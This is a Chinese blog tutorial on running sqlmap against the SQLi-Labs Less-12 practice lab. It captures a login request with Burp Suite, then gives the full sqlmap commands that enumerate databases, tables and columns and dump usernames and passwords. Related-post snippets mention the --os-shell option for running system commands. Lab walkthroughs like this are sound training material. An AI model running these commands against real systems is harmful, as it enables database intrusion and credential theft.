SQLMAP进阶使用 --technique -v

最新推荐文章于 2024-05-14 20:32:45 发布
最新推荐文章于 2024-05-14 20:32:45 发布
阅读量5.2k 收藏 10
点赞数 3
分类专栏: SQL注入 文章标签: web安全 SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_l123/article/details/123014482
版权

实验原理

使用SQLMAP对存在POST注入点的网站进行自动化注入时,通常可以采用以下简便方法:利用Burpsuite抓包并保存HTTP request至文本文档,再利用sqlmap -r命令从文本文档中读取HTTP request并实施注入。
注入时,可以利用--technique参数指定SQLMAP使用的探测技术:B表示布尔盲注,T表示时间盲注(延迟注入),E表示报错注入,U表示联合查询注入,S表示堆查询注入;利用-v参数指定显示等级,当取值大于等于3时,将显示SQLMAP所使用的payload 详情。

1.访问SQLi-Labs网站

访问Less-12

http://192.168.5.116/sqli-labs/Less-12/

2.利用Burpsuite工具抓包

1)启动Burpsuite并设置代理服务端口

https://img-blog.csdnimg.cn/f547110f81494cb19cc6741ed79f2131.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWl9sMTIz,size_20,color_FFFFFF,t_70,g_se,x_16

2)设置Firefox代理

https://img-blog.csdnimg.cn/8d1c61438782446f9fb223fcec1677e3.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWl9sMTIz,size_18,color_FFFFFF,t_70,g_se,x_16

 注意:端口要一致

3)开启 Burpsuite的代理拦截功能
https://img-blog.csdnimg.cn/86e4e8ba6f724c3ab32757cb9845ffbe.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWl9sMTIz,size_20,color_FFFFFF,t_70,g_se,x_16

 4)利用Burpsuite工具拦截HTTP请求包

输入用户名admin,密码任意,点击Submit登录,此时Burpsuite会拦截到HTTP请求包

 5)将请求包内容拷贝至D:\1.txt中

3.启动SQLMAP

进入sqlmap目录,在搜索框输入cmd,并回车

https://img-blog.csdnimg.cn/ca82c496933e43629ad82f5169db5c08.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWl9sMTIz,size_20,color_FFFFFF,t_70,g_se,x_16

 4.寻找注入点

python sqlmap.py -r D:\1.txt --technique "U" -v 3

其中,--technique"U"表示使用基于联合查询的技术;-v表示显示等级,当取值大于等于3时,将显示SQLMAP检测过程中所使用的payload详情。

 

 检测结果

5.获取数据库的库名 

 1)获取所有数据库的库名

python sqlmap.py -r D:\1.txt --technique "U" -v 3 --dbs

 2)获取当前数据库的库名

python sqlmap.py -r D:\1.txt --technique "U" -v 3 --current-db

 6.获取security数据库中的所有表名

python sqlmap.py -r D:\1.txt --technique "U" -v 3 -D security --tables

其中,有一个名为users的表,这当中可能存放着网站用户的基本信息。

7.获取users表的全部字段名

python sqlmap.py -r D:\1.txt --technique "U" -v 3 -D security -T users --columns

 

8.获取users表id,username和password字段的全部值

python sqlmap.py -r D:\1.txt --technique "U" -v 3 -D security -T users -C id,username,password --dump

 

Z_l123
关注
  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap使用教程(6)-注入技术拓展
fanmeng2008的博客
01-25 1022
选项--technique,可以用来指定SQL注入技术,默认为BEUSTQ。其中,B表示基于布尔盲注,E表示基于错误的盲注,U表示基于联合查询注入,S表示堆叠注入,T表示基于时间盲注,Q表示内联查询注入。
sqlmap新手教程
weixin_66717977的博客
06-30 1778
sqlmap
网络安全最全SQLmap使用教程图文教程(超详细),2024年最新太厉害了
最新发布
2401_84264610的博客
05-14 1056
1、检测「注入点」2、查看所有「数据库」3、查看当前使用的数据库4、查看「数据表」5、查看「字段」6、查看「数据」
web安全攻防-sqlmap注入技术参数
weixin_45905671的博客
02-20 988
sqlmap注入技术参数 sqlmap设置具体SQL注入技术 参数 --technique 此参数用于指定检测注入时所用技术。默认情况下Sqlmap使用自己支持的全部技术进行 检测。 此参数后跟表 示检测技术的大写字母,其值为B、E、U、S、T或Q,含义如下: B:Boolean-based blind(布尔型注入) E:Error-based(报错型注入) U:Union query-base...
Web安全攻防的学习——04—(Sqlmap性能优化、在kali中搭建Sqli-labs、虚拟机使用本机靶场、sqlmap自定义检测参数、sqlmap注入参数、sqlmap注入技术参数)(重要)
weixin_42118531的博客
02-27 929
1、Sqlmap性能优化 sqlmap设置持久HTTP连接 优势:长连接避免浪费重复连接的网络开销 缺点:大量的长连接占用服务器资源 sqlmap中可以设置连接为持久连接。HTTP报文中设置connection:keep-alive 但是–keep-alive这个参数和–p’roxy这个参数相冲突,不能在一起使用 sqlmap设置不接收HTTP Bod 参数 --null-connec...
Sqlmap详细使用教程
qq_47177909的博客
03-23 1837
sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过带外数据连接的方式执行操作系统命令。NOTE] 链接。
sqlmap-1.6.5-11_sqlmap-1.6.5-11
09-20
sqlmap-1.6.5-11 sql注入工具
sqlmap-1.3.7-19.zip
07-12
sql注入漏洞扫描工具,209最新版,1.3.7-19dev开发版。配合python2.7使用
sqlmap-1.4.5.zip
05-22
sqlmap-1.4.5,亲爱的朋友,SQLMAP是自动化的SQL注入和数据库接管工具,是开源的渗透测试工具,它能自动检测和利用SQL注入漏洞并接管数据库服务器。它配备了强大的检测引擎、最终渗透测试器的许多利基特性和广泛的...
第二十节 Sqlmap系统参数-01
09-15
使用--os-shell选项,Sqlmap可以执行系统命令,例如: ``` python sqlmap.py -u "注入点" --os-shell ``` 这将打开一个交互式shell,允许用户执行系统命令和控制目标系统。 二、Sqlmap结合Metasploit Sqlmap可以...
sqlmap-wiki-zhcn-v1.1.pdf
08-30
sqlmap使用中文手册
SQLMAP工具 详细使用方法
HAKUNAMATATATTA的博客
11-15 3333
SQLMAP 是一个开源的渗透测试工具,可以用来自动化的检测,利用 SQL 注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
SQLmap
qq_41638872的博客
06-23 1610
SQLmap使用
SQLMAP参数中文解说
收集盒 Book box
10-24 875
#HiRoot's Blog  Options(选项):  --version 显示程序的版本号并退出  -h, --help 显示此帮助消息并退出  -v VERBOSE 详细级别:0-6(默认为1)    Target(目标):  以下至少需要设置其中一个选项,设置目标URL。    -d DIRECT 直接连接到数据库。  -u URL, --url=URL 目标URL。  -l LIST 
sql学习3(sqlmap使用)
cyy001128的博客
04-03 583
接上一篇学习2。
sqlmap使用教程
weixin_57048716的博客
11-26 1731
常用步骤: 1.探测数据库名 --dbs --batch 2.探测表名 -D 库名 --tables --batch 3.探测字段名 -D 库名 -T 表名 --columns --batch 4.探测字段值 -D 库名 -T 表名 -C username(字段),password --dump --batch
Sqlmap使用(1)
qq_49283465的博客
04-27 1416
SQL注入工具使用菜鸟的自我反思sqlmap常用指令爆破与提升注入os-shell连接数据库后期建议 菜鸟的自我反思 一个合格的菜鸟应该知道自己该干什么,不该干什么。作为一个web安全的菜鸟,刚开始的时候应该以工具入手,但这远远不是终点。工具是死的,而人的思维是灵活的。从工具入手,提升个人渗透的乐趣,在进一步理解原理进行魔改。 sqlmap常用指令 爆破与提升 常规爆破命令: sqlmap -u “目标网址” --dbs sqlmap -u1 “目标网址” -D [数据库名] --tables sqlmap
SQLMAP注入教程-11种常见SQLMAP使用方法详解
dfdhxb995397的博客
08-24 4019
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 一共有11种常见SQLmap使用方法:一、SQLMAP用于Access数据库注入(1) 猜解是否能注入 ...
Sqlmap中文手册
热门推荐
若水斋
12-22 12万+
这是我自己翻译的Sqlmap1.1.10的中文手册。Sqlmap是十分著名的、自动化的SQL注入工具。为了较为系统地学习Sqlmap,我决定翻译一遍Sqlmap的用户手册,于是便有了此文。由于我英语学得很差,所以翻译地不好。基本上是意译,还加入了我自己的东西,和原文有较大差距。
sqlmap (--os-shell)的使用
07-28
sqlmap是一款用于自动化SQL注入和数据库接管的工具。使用--os-shell参数可以在受攻击的目标上执行操作系统命令。首先,用户需要具备dba权限才能使用--os-shell参数\[1\]。然后,可以通过以下命令来攻击目标并获取操作系统shell: ``` sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --os-shell ``` 在使用--os-shell参数之前,需要确保Mysql数据库的secure_file_priv参数允许导入导出操作\[2\]。如果secure_file_priv参数的值为null,表示不允许导入导出操作,需要管理员修改该参数的值。在Mysql 5.7版本以上,默认情况下secure_file_priv参数的值为null,因此需要管理员修改该参数的值才能使用--os-shell参数\[2\]。 使用--os-shell参数的原理是通过使用into outfile函数上传两个php文件,一个用于上传文件,另一个用于执行系统命令并返回结果\[3\]。这样就可以在目标系统上执行操作系统命令。 请注意,使用sqlmap进行攻击是非法的,仅用于安全测试和研究目的。 #### 引用[.reference_title] - *1* *2* *3* [sqlmap —— os-shell参数分析](https://blog.csdn.net/qq_43531669/article/details/120630864)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值